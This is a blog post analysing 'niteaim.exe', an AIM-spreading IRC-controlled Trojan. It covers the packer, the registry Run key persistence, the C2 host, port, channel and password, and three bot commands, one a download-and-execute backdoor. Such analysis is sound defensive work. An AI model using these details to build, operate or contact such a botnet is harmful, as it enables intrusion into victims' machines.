Skip to content

Malware Analysis - Niteaim

It seems that in the last 24 hours a new Trojan horse that spreads itself through AIM makes it's rounds. The file, which is included in disabled form in the archive you can find at the end of this post, is called niteaim.exe. Google has not heard of it so far. I've performed a thorough analysis of it.

The file is packed using a very simple PE packer which does not contain any anti-analysis features like anti-debugging or anti-disassembling code. It's also not polymorphic or anything else, just simple, un-obfuscated code. The unpacking code can be found between the offsets 0x400158 and 0x4001FA. The packed code can be found at offset 0x406000, it'll be unpacked to 0x401000.
After unpacking and loading necessary imports is done execution continues in the unpacked code at offset 0x402076 which is the initialization code for programs written in VC++. The actual code of the virus begins at 0x40103F.

The main function creates a named mutex with the name ANITE that makes sure the Trojan horse is only active once. Then it copies itself (niteaim.exe) to the Windows directory and creates a registry entry at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNite.

Afterwards the Trojan horse attempts to connect to the internet, specifically to an IRC server at anite.m1rr0r.net (port 8080). The server expects a first IRC command of the form "USER %s %s %s :%s\r\nNICK %s\r\n" where all %s are the same random string of the form "NXXXXXXXXXX" where each X is a random digit. Once connected the Trojan horse enters the IRC chan #aim with the password knight (although no password is actually set there) to wait for further instructions from the owner of the IRC server (the main IRC function starts at 0x4014F4). Curiously enough the Trojan horse checks if the host of the client it interacts with is not of the form *FBI.GOV*.

The Trojan horse can recognize three commands which are sent to it through private messages on the IRC server.
The first command is ":r" which executes the function at 0x4019B8 (removes the auto-start key) and afterwards terminates the Trojan horse.
The second command is ":a" which asks the Trojan horse to search for an active AIM session and if there's one to spread itself through it by sending private messages to users on the contact list. For this purpose a new thread is started with thread function 0x401F46.
The third command is ":d" which serves as a backdoor onto the user's PC. This command takes parameters in the form of a URL and a local filename. The Trojan horse then tries to download a file from the given URL to the given local file. If downloading is successful the local file will be executed. This function is also executed in a thread with thread function 0x401A23.

I guess circulation of this Trojan horse started within the last 24 hours. When I first joined the IRC channel few hours ago only a little more than 30 infected clients were in there. I'm still idling there hoping to receive some commands from the server owner (no success so far) and the number of clients has exceeded 400 now and it's rapidly growing.

Click here for an archive that includes the following files:
- The Trojan horse binary (in disabled form)
- The IDA 4.8 IDB file I used to analyze the Trojan horse
- An annotated disassembly in HTML format

Edit: Update - The number of infected clients on that IRC network grew to over 25,000 while I was asleep. Two download commands were sent to the clients and then the server shut down a while afterwards. It's likely that the botnet moved elsewhere.

Trackbacks

No Trackbacks

Comments

Display comments as Linear | Threaded

No comments

Add Comment

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.
BBCode format allowed
Form options

Submitted comments will be subject to moderation before being displayed.